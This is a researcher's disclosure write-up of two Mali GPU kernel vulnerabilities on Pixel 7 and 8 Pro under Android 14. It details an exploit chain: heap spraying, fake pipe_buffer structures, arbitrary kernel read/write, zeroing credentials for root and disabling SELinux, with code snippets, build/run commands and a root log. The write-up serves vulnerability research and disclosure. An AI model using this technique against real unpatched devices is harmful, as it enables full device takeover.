Mali GPU Kernel LPE
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
- Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
- Pixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
- Pixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
- Pixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys
(by m4b4 (Marcel))
Vulnerabilities
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl
ioctl command, and an information leak within the timeline stream message buffers.
Buffer Underflow in gpu_pixel_handle_buffer_liveness_update_ioctl() Due to Incorrect Integer Overflow Fix
Google addressed an integer overflow in the gpu_pixel_handle_buffer_liveness_update_ioctl
ioctl command in this commit. When I first reported this issue, I believed the bug stemmed from a flaw in that patch. After reviewing the report, I realized that my analysis of the vulnerability was inaccurate: contrary to my initial assumption that the patch was incomplete, it does effectively prevent an underflow in the calculation. This led me to suspect that the change had not been applied to the production builds. However, while I can cause an underflow in the calculation, I cannot cause an overflow, which suggests that the ioctl command has been partially fixed, although not with the patch above. Inspecting the binary in IDA revealed that a different, incomplete patch was shipped in the production releases, and that this patch is not present in any git branch of the Mali GPU kernel module.
This vulnerability was first discovered in the latest Android version and reported on November 19, 2023. Google later informed me that they had already identified it internally and had assigned it CVE-2023-48409 in the December Android Security Bulletin, labeling my report as a duplicate. Although I was able to verify that the bug had been identified internally months before my report (based on the commit date, around August 30), some confusion remains. Specifically, it is strange that the most recent devices at the October and November Security Patch Levels (SPL) were still affected by this vulnerability; I have not investigated earlier versions. Therefore, I am unable to conclusively determine whether this was truly a duplicate issue, with the appropriate patch already scheduled for December before my submission, or whether there was an oversight in addressing this vulnerability.
Anyway, what makes this bug powerful is the following:
- The buffer info.live_ranges is fully user-controlled.
- The overflowing values are user-controlled input, so we can overflow the calculation and place the info.live_ranges pointer at an arbitrary offset before the start of the buff kernel address.
- The allocation size is also user-controlled input, which gives the ability to request a memory allocation from any general-purpose slab allocator.
This vulnerability shares similarities with the DeCxt::RasterizeScaleBiasData() Buffer underflow vulnerability I found and exploited in the iOS 15 kernel back in 2022.
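To make the arithmetic behind these properties concrete, here is a minimal sketch. It assumes the allocation size is computed in 64-bit unsigned arithmetic as two 8-byte arrays of buffer_count entries plus 4 bytes per live range, which is inferred from the 16-byte alignment and the "times 4" figure mentioned later in this article. The function and struct names are hypothetical, and the checks added by the production patch are not modelled.

```c
#include <stdint.h>

/* Hypothetical model of the size computation; not the driver's code. */
struct liveness_layout {
    uint64_t alloc_size;      /* size requested from the allocator after wrap-around */
    int64_t  live_ranges_off; /* offset of live_ranges relative to buff */
    uint64_t copy_len;        /* bytes copied from user space to live_ranges */
};

struct liveness_layout model_layout(uint64_t buffer_count,
                                    uint64_t live_ranges_count)
{
    struct liveness_layout l;
    /* Assumed: two arrays of 8-byte entries precede live_ranges. */
    uint64_t arrays_size = (uint64_t)2 * sizeof(uint64_t) * buffer_count;

    l.copy_len = 4 * live_ranges_count;      /* assumed 4 bytes per live range */
    l.alloc_size = arrays_size + l.copy_len; /* wraps modulo 2^64 */
    /* Reinterpreted as signed (two's complement), a huge arrays_size
     * becomes a negative offset from buff. */
    l.live_ranges_off = (int64_t)arrays_size;
    return l;
}
```

Under these assumptions, buffer_count = 0x0FFFFFFFFFFFFC00 and live_ranges_count = 0x1C01 reproduce the figures used in the exploitation notes: an allocation of 0x3004 bytes, a live_ranges pointer 0x4000 bytes before buff, and a copy of 0x7004 bytes.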
Leakage of Kernel Pointers in Timeline Stream Message Buffers
The GPU Mali implements a custom timeline stream
designed to gather information, serialize it, and subsequently write it to a ring buffer following a specific format. Users can invoke the ioctl command kbase_api_tlstream_acquire
to obtain a file descriptor, enabling them to read from this ring buffer. The format of the messages is as follows:
- A packet header
- A message id
- A serialized message buffer, where the specific content is contingent upon the message ID.
For example, the __kbase_tlstream_tl_kbase_kcpuqueue_enqueue_fence_wait function serializes the kbase_kcpu_command_queue and dma_fence kernel pointers into the message buffer, which leaks kernel pointers to the user-space process.
void __kbase_tlstream_tl_kbase_kcpuqueue_enqueue_fence_wait(
    struct kbase_tlstream *stream,
    const void *kcpu_queue,
    const void *fence
)
{
    const u32 msg_id = KBASE_TL_KBASE_KCPUQUEUE_ENQUEUE_FENCE_WAIT;
    const size_t msg_size = sizeof(msg_id) + sizeof(u64)
        + sizeof(kcpu_queue)
        + sizeof(fence)
        ;
    char *buffer;
    unsigned long acq_flags;
    size_t pos = 0;
    buffer = kbase_tlstream_msgbuf_acquire(stream, msg_size, &acq_flags);
    pos = kbasep_serialize_bytes(buffer, pos, &msg_id, sizeof(msg_id));
    pos = kbasep_serialize_timestamp(buffer, pos);
    pos = kbasep_serialize_bytes(buffer,
        pos, &kcpu_queue, sizeof(kcpu_queue));
    pos = kbasep_serialize_bytes(buffer,
        pos, &fence, sizeof(fence));
    kbase_tlstream_msgbuf_release(stream, acq_flags);
}
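On the user-space side, a message serialized this way could be decoded roughly as follows. This is a sketch, not the PoC's parser: it assumes the packet header has already been skipped, that kernel pointers are 8 bytes wide, and that host and device share the same byte order. The struct and function names are hypothetical, and comparing msg_id against the real KBASE_TL_* value is left to the caller.

```c
#include <stdint.h>
#include <string.h>

/* Fields in the order the kernel function above serializes them. */
struct fence_wait_msg {
    uint32_t msg_id;
    uint64_t timestamp;
    uint64_t kcpu_queue; /* leaked kernel pointer */
    uint64_t fence;      /* leaked kernel pointer */
};

#define FENCE_WAIT_MSG_SIZE (sizeof(uint32_t) + 3 * sizeof(uint64_t))

/* Returns 0 on success, -1 if the buffer is too short for one message. */
int parse_fence_wait_msg(const uint8_t *buf, size_t len,
                         struct fence_wait_msg *out)
{
    size_t pos = 0;

    if (len < FENCE_WAIT_MSG_SIZE)
        return -1;
    /* memcpy avoids unaligned accesses: the stream is tightly packed. */
    memcpy(&out->msg_id, buf + pos, sizeof(out->msg_id));
    pos += sizeof(out->msg_id);
    memcpy(&out->timestamp, buf + pos, sizeof(out->timestamp));
    pos += sizeof(out->timestamp);
    memcpy(&out->kcpu_queue, buf + pos, sizeof(out->kcpu_queue));
    pos += sizeof(out->kcpu_queue);
    memcpy(&out->fence, buf + pos, sizeof(out->fence));
    return 0;
}
```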
The proof of concept exploit leaks the kbase_kcpu_command_queue
object address by monitoring the stream for the message ID KBASE_TL_KBASE_NEW_KCPUQUEUE
which is dispatched by the kbasep_kcpu_queue_new
function whenever a new kcpu queue object is allocated.
Google informed me that the vulnerability was reported in March 2023 and was assigned CVE-2023-26083 in their security bulletin. Nonetheless, I was able to replicate the issue on the latest Pixel devices shipped with the Security Patch Levels (SPL) for October and November, indicating that the fix had not been applied correctly or at all. Subsequently, Google quickly addressed the issue in the December Security Update Bulletin without offering credit, and later informed me that the issue was considered a duplicate. The rationale behind labeling this issue as a duplicate, however, remains questionable.
Exploitation
So I have two interesting vulnerabilities. The first one offers a powerful capability to modify the content of any 16-byte aligned kernel address that comes before the allocated buff address. The second vulnerability provides hints into the potential locations of objects within the kernel memory.
Notes on buffer_count and live_ranges_count Values
With total control over the buffer_count
and live_ranges_count
fields, I have the flexibility to select the target slab and the precise offset I intend to write to. However, selecting values for buffer_count
and live_ranges_count
requires careful consideration due to several constraints and factors:
- Both values are related, and the overflow will occur only if all the newly introduced checks are bypassed.
- The requirement for the negative offset to be 16-byte aligned restricts the ability to write to any chosen location. However, this is generally not a significant hindrance.
- Opting for a larger offset leads to a large amount of data being written to areas of memory that may not be intended targets. For instance, if the allocation size overflows to 0x3004, the live_ranges pointer would be set to -0x4000 bytes from the buff object's allocated space. The copy_from_user function would then write 0x7004 bytes, based on the calculation of update->live_ranges_count times 4. Consequently, user-controlled data would overwrite the memory area between the live_ranges pointer and the buff allocation. It is therefore essential to ensure that no critical system objects within that range are accidentally overwritten. Since the operation involves a copy_from_user call, one might consider triggering an EFAULT by deliberately unmapping the memory region that follows the user source buffer, so that no data is written to sensitive locations. However, this approach is ineffective: if raw_copy_from_user fails partway through, _copy_from_user zeroes out the remaining bytes in the destination kernel buffer. This behavior ensures that after a partial copy caused by an error, the rest of the kernel buffer does not contain uninitialized data.
static inline __must_check unsigned long
_copy_from_user(void *to, const void __user *from, unsigned long n)
{
    unsigned long res = n;
    might_fault();
    if (!should_fail_usercopy() && likely(access_ok(from, n))) {
        instrument_copy_from_user(to, from, n);
        res = raw_copy_from_user(to, from, n);
    }
    if (unlikely(res))
        memset(to + (n - res), 0, res);
    return res;
}
Considering this, we need to carefully select the object to overwrite and the data to write.
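The effect of that memset can be reproduced with a small user-space model. This is only an illustration of the tail handling shown above; the readable parameter is a stand-in for the point where the source buffer faults, and model_copy_from_user is a hypothetical name.

```c
#include <stddef.h>
#include <string.h>

/*
 * User-space model of _copy_from_user(): copies up to `readable` bytes,
 * then zero-fills whatever could not be copied.
 * Returns the number of bytes NOT copied, like the kernel helper.
 */
size_t model_copy_from_user(void *to, const void *from, size_t n,
                            size_t readable)
{
    size_t copied = readable < n ? readable : n;
    size_t res = n - copied;

    memcpy(to, from, copied);
    if (res)
        memset((char *)to + copied, 0, res); /* same tail zeroing as the kernel */
    return res;
}
```

In this model, a fault after the third byte of an 8-byte copy still modifies all 8 destination bytes: the first three carry user data and the remaining five become zero. This is why unmapping the tail of the source buffer does not protect the objects that sit between live_ranges and buff.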
Choosing the Right Object to Overwrite
Because I’m stuck with this unfortunate zeroing behavior, my strategy is to identify an object that can be nulled out without producing any undesired outcome. But before I get to that, there's another issue to deal with. Remember when I said earlier that I can choose any allocation size, and thus any general-purpose slab cache, to service my allocation? That’s not quite correct, and copy_from_user is again the reason, this time because of the CONFIG_HARDENED_USERCOPY mitigation. When the kernel destination buffer is a heap object, the mitigation forbids copying a size that does not fit the corresponding slab cache. It determines whether the buffer's page is a slab page and, if so, retrieves the matching kmem_cache->size and verifies that the user-supplied size does not exceed it; on a mismatch, the kernel simply crashes. In other words, I cannot target objects that belong to the general-purpose allocator, BUT I can still target large objects (i.e. those served directly by the page allocator).
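The constraint can be summarized with a deliberately simplified model. It encodes only what is described above (slab-backed destinations are bounded by the cache object size, page-allocator-backed ones are not checked here) and omits every other check the real mitigation performs; usercopy_allowed and its parameters are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/*
 * Simplified model of the hardened usercopy decision.
 * is_slab_page: destination lives in a slab page
 * object_size:  size of the slab cache object (kmem_cache->size)
 * offset:       destination offset inside that object
 * n:            number of bytes to copy
 */
bool usercopy_allowed(bool is_slab_page, size_t object_size,
                      size_t offset, size_t n)
{
    if (!is_slab_page)
        return true; /* model: no slab size check for page-allocator memory */
    return offset <= object_size && n <= object_size - offset;
}
```

With this model, a 0x7004-byte copy into a 0x80-byte slab object is rejected, while the same copy into memory obtained directly from the page allocator passes, which is the reason for targeting large objects.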
The first thought that came to mind was to use the pipe_buffer
technique, which is a very elegant technique to obtain arbitrary read/write primitives. I won't go into detail about the technique, but readers are encouraged to read this fantastic blog from Interrupt Labs. When constructing a pipe object, the pipe_buffer
object is initially created in an array of 16 elements; however, the array size can be adjusted using fcntl(F_SETPIPE_SZ)
. Therefore, the pipe_buffer
array allocation can be adjusted such that it can be served from the page allocator, making it a perfect target object to attack.
After selecting the pipe_buffer object as a target candidate, the next step toward achieving kernel r/w is to overwrite its content using the underflow vulnerability. This lets me read from and write to any memory location whose struct page address I store in the pipe_buffer->page field.
Because the vulnerability allows me to write arbitrary data, I can control the whole content of the pipe_buffer, including its page field. To do so, I need the pipe_buffer array to be allocated before the vulnerable buff object, and the two have to be adjacent.
Positioning pipe_buffer and buff Objects Adjacently
I sprayed the kernel memory with a lot of kbase_kcpu_command_queue
objects, followed by a bunch of pipe_buffer
arrays.
I can’t just use the pipe_buffer
arrays alone as a primary source for spraying due to the limitation imposed by pipe_max_size
. Therefore, I decided to start spraying with the kbase_kcpu_command_queue
object. I chose the kbase_kcpu_command_queue object for two reasons: its allocation size is 0x38C8, so it is handled by the page allocator, and I can deterministically obtain its kernel address using the kernel information leak bug. This makes it a good object to spray with as well as a good object to target (as we’ll see in the next section).
As mentioned before, I used fcntl(F_SETPIPE_SZ)
to increase the size of the pipe_buffer
array allocation so that it can be served by the page allocator. To be more specific, I chose an allocation size of 0x4000 bytes (4 * PAGE_SIZE) in order to be consistent with the kbase_kcpu_command_queue
allocations.
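A minimal sketch of the resizing step follows. The 256-slot figure comes from the demo log at the end of this article; the 40-byte sizeof(struct pipe_buffer) is an assumption for a 64-bit kernel, and both helper names are hypothetical. With those numbers the array needs 0x2800 bytes, which I assume the allocator rounds up to the 0x4000 bytes mentioned above.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031 /* Linux value, used if the libc headers hide it */
#endif

/* Assumed size of struct pipe_buffer on a 64-bit kernel. */
#define ASSUMED_PIPE_BUFFER_SIZE 40UL

/* Bytes needed for a pipe_buffer array with `slots` ring entries. */
unsigned long pipe_array_bytes(unsigned long slots)
{
    return slots * ASSUMED_PIPE_BUFFER_SIZE;
}

/*
 * Creates a pipe and asks the kernel for `slots` page-sized ring entries.
 * Returns the capacity in bytes reported by the kernel, or -1 on error.
 */
long make_sized_pipe(int fds[2], unsigned long slots)
{
    long page = sysconf(_SC_PAGESIZE);
    int cap;

    if (page <= 0 || pipe(fds) != 0)
        return -1;
    cap = fcntl(fds[1], F_SETPIPE_SZ, (int)(slots * (unsigned long)page));
    if (cap < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    return cap;
}
```

Requests above the system-wide pipe size limit fail for unprivileged processes, which is the pipe_max_size limitation mentioned earlier.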
Obtaining a struct page Address
To use the pipe_buffer properly, a valid struct page address is required. Because I can identify the kernel address of a kbase_kcpu_command_queue object that I can deliberately create and destroy, that object is a good candidate, and its matching struct page can be found with virt_to_page.
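In user space, virt_to_page has to be re-implemented as plain arithmetic. The sketch below follows the arm64 linear-map formula as I understand it, and assumes 4 KiB pages and a 64-byte struct page. PAGE_OFFSET and VMEMMAP_START differ between kernel versions and configurations, so they are passed in as parameters; model_virt_to_page is a hypothetical name.

```c
#include <stdint.h>

#define ASSUMED_PAGE_SHIFT       12    /* 4 KiB pages */
#define ASSUMED_STRUCT_PAGE_SIZE 64ULL /* sizeof(struct page), assumed */

/*
 * Maps a linear-map kernel virtual address to the address of its
 * struct page inside the vmemmap array.
 */
uint64_t model_virt_to_page(uint64_t vaddr, uint64_t page_offset,
                            uint64_t vmemmap_start)
{
    uint64_t idx = (vaddr - page_offset) >> ASSUMED_PAGE_SHIFT;

    return vmemmap_start + idx * ASSUMED_STRUCT_PAGE_SIZE;
}
```

For a quick check, calling it with page_offset = 0xffffff8000000000 and vmemmap_start = 0xfffffffe00000000 (assumed values for a 39-bit VA configuration, not taken from the PoC) maps 0xffffff8901390000 to 0xfffffffe2404e400.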
Contents to Write in the pipe_buffer
The pipe_buffer object is defined as follows:
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};
As previously mentioned, the page
field must include a valid page address. The offset
and len
fields must not exceed PAGE_SIZE
, otherwise the pipe will increase the head/tail counters, resulting in the use of a new pipe_buffer
object and loss of control over the fake pipe buffer.
Also, the flags field must be set to PIPE_BUF_FLAG_CAN_MERGE. With this flag, subsequent pipe_write calls do not blindly increment the head counter and move on to the next pipe buffer. Instead, pipe_write first checks whether the current pipe_buffer has enough space for the write request and, if so, simply appends the data to the same pipe buffer, starting at the value stored in the len field.
To avoid crashing the device in pipe_buf_confirm, which is called by both pipe_write and pipe_read, the ops pointer must also be a valid kernel address whose ops->confirm field is NULL. I can simply use an offset within the leaked kbase_kcpu_command_queue object that is NULL and will not change under any circumstances.
Choosing the Optimal Offset Value for Underflow
While the allocation sizes of the buff, kbase_kcpu_command_queue and pipe_buffer objects are 0x4000 bytes, I chose to underflow the buffer by 0x8000 bytes. Why?
Let's take a brief look at how pipe_buffers
are updated during read and write operations. Assume we can shape the pipe_buffer
to look like this:
struct pipe_buffer fake = {
    .page = virt_to_page(addr),
    .offset = 0,
    .len = 0x40,
    .ops = (const void *)(kcpu_addr + 0x50),
    .flags = PIPE_BUF_FLAG_CAN_MERGE,
    .private = 0,
};
While the bug gives the ability to arbitrarily control the content of this object, it only does so once, because the underflowed object is freed immediately after the ioctl call finishes. This poses a problem: I would need to manually update the pipe_buffer object to make it usable again, because of how each pipe read/write operation treats its fields:
- The .page field is not updated; it remains the same, and when the buffer is empty, it is released, which I do not want to happen because the .ops field is not correctly set.
- The pipe_buffer updates the .offset field on a read operation, so I cannot read the same memory region again.
- Data written to the pipe_buffer is appended to the buffer starting from the .len value (assuming that the PIPE_BUF_FLAG_CAN_MERGE flag is set), and .len is updated accordingly. That is, we can't write data to the exact same address twice.
As a result, unless I properly update the pipe_buffer after each read or write operation, I cannot both read from and write to the same location through a single pipe. That's why underflowing by 0x8000 bytes is much more practical: instead of overwriting a single pipe_buffer, I overwrite two distinct pipe_buffer instances belonging to two distinct pipe objects, one used for read operations and the other for write operations.
#define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */
pipe_read = (struct pipe_buffer *)( ptr);
pipe_read->page = virt_to_page(ta->kcpu_kaddr);
pipe_read->offset = 0;
pipe_read->len = 0xfff;
pipe_read->ops = (const void *)(ta->kcpu_kaddr + 0x50);
pipe_read->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe_read->private = 0;
pipe_write = (struct pipe_buffer *)( ptr + 0x4000);
pipe_write->page = virt_to_page(ta->kcpu_kaddr);
pipe_write->offset = 0;
pipe_write->len = 0; /* This is the starting position of the pipe_write */
pipe_write->ops = (const void *)(ta->kcpu_kaddr + 0x50);
pipe_write->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe_write->private = 0;
The pipe_read
is a fake pipe buffer that will be used for reading data from the target page starting at .offset = 0
up to 0xfff
bytes, whereas pipe_write
is a fake pipe_buffer
that will be used for writing data starting from .len = 0
up to 0xfff
bytes.
It's also important to mention again that writing more than PAGE_SIZE bytes pushes the pipe to increment the head counter, which switches to a freshly allocated pipe_buffer and loses control over our fake pipe_write. On the other hand, emptying the fake pipe_read buffer (reading all 0xfff bytes from it) tells the kernel to release the underlying page by calling ops→release, which crashes the kernel because I still don’t have a kernel text address.
Although I managed to separate the pipe read and write operations so that a write on one pipe does not interfere with the other pipe buffer and vice versa, I still haven’t solved the core issue: how to reliably update the pipe buffer? The obvious answer that came to mind was to repeat the spray process after each pipe read or write call, but that is not a workable option because it would significantly hurt exploit reliability. In the following sections, I divide the goal into two sub-goals: first I focus on the .page field only, then on the .len/.offset fields.
Modifying the pipe_buffer→page Field
To my surprise, I don't need to update the .page field at all, because I can overwrite pipe_buffer→page so that it points to the page of the leaked kbase_kcpu_command_queue. All I need to do then is release the kbase_kcpu_command_queue object and overlap it with a new pipe_buffer array. Yup! Now I have a pipe_buffer→page that points to a legitimate pipe_buffer object!
Replacing kbase_kcpu_command_queue
with pipe_buffer
gives us the ability to manipulate a legitimate pipe buffer without regularly having to update the .page
field. However, I still have to deal with the .len
and .offset
fields.
Modifying the pipe_buffer→len/offset Fields
As I've mentioned earlier, a pipe read/write updates the .len and .offset fields, which prevents subsequent read/write operations on the same part of the page, even when they are performed over the two distinct pipes. Here's another trick: it is possible to read/write data without touching the .len/.offset fields at all, by faulting the copy_page_from_iter and copy_page_to_iter calls made by pipe_write and pipe_read! Yes, just like copy_to/from_user, copy_page_to/from_iter copies data to/from the user-space memory described by the iov_iter structure, and it can be faulted.
To continue with the previous example, if we wish to write 8 bytes of data to an address, the user-space buffer must hold exactly 8 bytes and be immediately followed by an unmapped or non-readable area of memory. We then pass 9 as the size argument to the write system call. The operation copies 8 bytes and faults on the ninth because it hits the unmapped/unreadable location. As a result, the data has been effectively written to the destination kernel buffer while the .len field has not been modified: the pipe_write kernel function simply returns without updating the buf->len field.
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
    offset + chars <= PAGE_SIZE) {
    ret = pipe_buf_confirm(pipe, buf);
    if (ret)
        goto out;
    ret = copy_page_from_iter(buf->page, offset, chars, from);
    if (unlikely(ret < chars)) {
        ret = -EFAULT;
        goto out;
    }
    buf->len += ret;
    if (!iov_iter_count(from))
        goto out;
}
The same is true for read operations: if we wish to read 8 bytes, we make the ninth byte of the destination buffer inaccessible (unmapped or non-writable) and then request a 9-byte read. The data is copied to the user buffer without changing the .offset
field.
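The user-space half of this trick can be sketched as follows: the payload is placed at the very end of an accessible page, and the next page is made inaccessible. This is an illustration rather than the PoC's code; make_faulting_buffer is a hypothetical helper and the mapping is intentionally left in place.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Returns a pointer to `len` bytes of `data` laid out so that the byte
 * right after them belongs to a PROT_NONE page. Returns NULL on failure.
 * `len` must not exceed the page size.
 */
void *make_faulting_buffer(const void *data, size_t len)
{
    long page = sysconf(_SC_PAGESIZE);
    char *map;
    char *dst;

    if (page <= 0 || len > (size_t)page)
        return NULL;
    map = mmap(NULL, 2 * (size_t)page, PROT_READ | PROT_WRITE,
               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map == MAP_FAILED)
        return NULL;
    /* Second page: any access from the kernel copy routines will fault. */
    if (mprotect(map + page, (size_t)page, PROT_NONE) != 0) {
        munmap(map, 2 * (size_t)page);
        return NULL;
    }
    dst = map + page - len; /* payload ends exactly at the page boundary */
    memcpy(dst, data, len);
    return dst;
}
```

Passing the returned pointer to write() with a size of len + 1 is the pattern described above; the same buffer can serve as the destination of a read() of len + 1 bytes, since its first page is writable and the second is not.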
As a result, we are able to perform unlimited read/write operations on any kernel memory address without having to recurrently go through the spray process.
Getting root
Now that I have a strong arbitrary read/write primitive, I just looked through all the struct page
in the VMEMMAP_START
array to determine the kernel text starting address using the technique outlined in the Interrupt Labs blog post. Then I realized that init_task
is nulled out in Android November Security Updates, so I just used kthreadd_task
instead. Having kthreadd_task
kernel address allowed me to walk the task->tasks
list and obtain my own current
task kernel address, then zero out the cred
structure to achieve root privileges.
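The task list walk can be sketched with the read primitive abstracted behind a callback. Everything here is illustrative: kread64_fn stands for whatever the pipe-based primitive provides, the offsets are placeholders rather than real task_struct offsets, and the fake_* helpers only exist so that the sketch can run without a kernel.

```c
#include <stdint.h>

/* Hypothetical read primitive: returns the 64-bit value at a kernel address. */
typedef uint64_t (*kread64_fn)(uint64_t kaddr);

struct task_offsets {
    uint64_t tasks; /* offset of task_struct->tasks (struct list_head) */
    uint64_t pid;   /* offset of task_struct->pid (32-bit field) */
};

/* Walks the circular tasks list; returns the matching task address or 0. */
uint64_t find_task_by_pid(kread64_fn kread64, const struct task_offsets *off,
                          uint64_t start_task, uint32_t pid,
                          unsigned max_steps)
{
    uint64_t task = start_task;

    for (unsigned i = 0; i < max_steps; i++) {
        /* pid is 32 bits wide: keep the low half (little-endian). */
        if ((uint32_t)kread64(task + off->pid) == pid)
            return task;
        /* tasks.next points at the next task's list_head, not its start. */
        task = kread64(task + off->tasks) - off->tasks;
        if (task == start_task)
            break; /* wrapped around the whole list */
    }
    return 0;
}

/* Demo stand-in for kernel memory: three fake 0x20-byte tasks in a ring. */
#define FAKE_BASE 0x1000ULL
static uint64_t fake_mem[3 * 4];

uint64_t fake_kread64(uint64_t kaddr)
{
    return fake_mem[(kaddr - FAKE_BASE) / 8];
}

void fake_setup(void)
{
    for (int i = 0; i < 3; i++) {
        uint64_t next = FAKE_BASE + (uint64_t)((i + 1) % 3) * 0x20;

        fake_mem[i * 4 + 0] = 100 + (uint64_t)i; /* +0x00: pid */
        fake_mem[i * 4 + 1] = next + 0x08;       /* +0x08: tasks.next */
    }
}
```

In the real exploit the starting point would be kthreadd_task and the pid to look for would be the exploit's own getpid() value.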
Later, I realized scanning all the page addresses was unnecessary because I already had the anon_pipe_buf_ops kernel text address from a pipe_buffer object. With this information, I could deduce the kernel text base address, effectively bypassing KASLR.
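The KASLR computation itself is a single subtraction. In the sketch below the function names are hypothetical, and the offsets used in the usage note are derived by subtracting the addresses printed in the demo log at the end of this article, so they apply only to that particular build.

```c
#include <stdint.h>

/* Kernel base = leaked symbol address - that symbol's build-specific offset. */
uint64_t kernel_base_from_leak(uint64_t leaked_symbol_addr,
                               uint64_t symbol_offset)
{
    return leaked_symbol_addr - symbol_offset;
}

/* Runtime address of any other symbol, once the base is known. */
uint64_t symbol_addr(uint64_t kernel_base, uint64_t symbol_offset)
{
    return kernel_base + symbol_offset;
}
```

With the logged values, an ops pointer of 0xffffffdaf18d3770 and an anon_pipe_buf_ops offset of 0x18c3770 give a kernel base of 0xffffffdaf0010000, and adding 0x2893168 yields the logged selinux_state address 0xffffffdaf28a3168.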
Disable SELinux
The exploit also disables SELinux. With the kernel text base address, I just need to find the selinux_state
global structure location and then zero out the .enforcing
value.
Proof of Concept
The proof of concept accompanying the report was tested on Pixel 7 and 8 Pro devices running Android 14 with the October and November ASBs, achieving a success rate of nearly 100%. It's also important to mention that the exploit will not work out of the box on other devices because it relies on some hardcoded offsets. To add support for a new device, one must provide the following:
- kthreadd_task offset from the kernel base address.
- selinux_state offset from the kernel base address.
- task_struct->cred, task_struct->pid and task_struct->tasks structure offsets.
- anon_pipe_buf_ops offset from the kernel base address.
Compilation
To compile the exploit as a standalone binary use the following command, then use adb shell
to run it:
$ aarch64-linux-androidXX-clang++ -static-libstdc++ -w -Wno-c++11-narrowing -DUSE_STANDALONE -o poc poc.cpp -llog
$ adb push poc /data/local/tmp/
$ adb shell /data/local/tmp/poc
You can also run the exploit from an Android Studio app by embedding this directory in it; make sure to disable the useless C++ warnings by adding -w -Wno-c++11-narrowing
to the cmake file.
Demo
$ adb logcat |grep -i EXPLOIT
11-28 16:04:12.500 7989 7989 E EXPLOIT : [+] Target device: 'google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys' 0xa9027bfdd10203ff 0xa90467faa9036ffc
11-28 16:04:15.563 7989 7989 E EXPLOIT : [+] Got the kcpu_id (0) kernel address = 0xffffff8901390000 from context (0x0)
11-28 16:04:18.441 7989 7989 E EXPLOIT : [+] Got the kcpu_id (255) kernel address = 0xffffff89b0bf8000 from context (0xff)
11-28 16:04:18.442 7989 7989 E EXPLOIT : [+] Found corrupted pipe with size 0xfff
11-28 16:04:18.442 7989 7989 E EXPLOIT : [+] SUCCESS! we have a fake pipe_buffer (0)!
11-28 16:04:18.444 7989 7989 E EXPLOIT : 10 00 39 01 89 FF FF FF 10 00 39 01 89 FF FF FF | ..9.......9.....
11-28 16:04:18.444 7989 7989 E EXPLOIT : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
11-28 16:04:18.444 7989 7989 E EXPLOIT : 00 B0 CD 12 C0 FF FF FF 00 00 00 00 00 00 00 00 | ................
11-28 16:04:18.444 7989 7989 E EXPLOIT : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
11-28 16:04:18.445 7989 7989 E EXPLOIT : [+] Freeing kcpu_id = 0 (0xffffff8901390000)
11-28 16:04:18.446 7989 7989 E EXPLOIT : [+] Allocating 61 pipes with 256 slots
11-28 16:04:18.462 7989 7989 E EXPLOIT : [+] Successfully overlapped the kcpuqueue object with a pipe buffer
11-28 16:04:18.463 7989 7989 E EXPLOIT : 40 AB BA 26 FE FF FF FF 00 00 00 00 30 00 00 00 | @..&........0...
11-28 16:04:18.463 7989 7989 E EXPLOIT : 70 37 8D F1 DA FF FF FF 10 00 00 00 00 00 00 00 | p7..............
11-28 16:04:18.463 7989 7989 E EXPLOIT : 00 00 00 00 00 00 00 00 | ........
11-28 16:04:18.463 7989 7989 E EXPLOIT : [+] pipe_buffer {.page = 0xfffffffe26baab40, .offset = 0x0, .len = 0x30, ops = 0xffffffdaf18d3770}
11-28 16:04:18.463 7989 7989 E EXPLOIT : [+] kernel base = 0xffffffdaf0010000, kthreadd_task = 0xffffff8002da3780 selinux_state = 0xffffffdaf28a3168
11-28 16:04:20.097 7989 7989 E EXPLOIT : [+] Found our own task struct 0xffffff88416c5c80
11-28 16:04:20.097 7989 7989 E EXPLOIT : [+] Successfully got root: getuid() = 0 getgid() = 0
11-28 16:04:20.097 7989 7989 E EXPLOIT : [+] Successfully disabled SELinux
11-28 16:04:20.102 7989 7989 E EXPLOIT : [+] Cleanup ... OK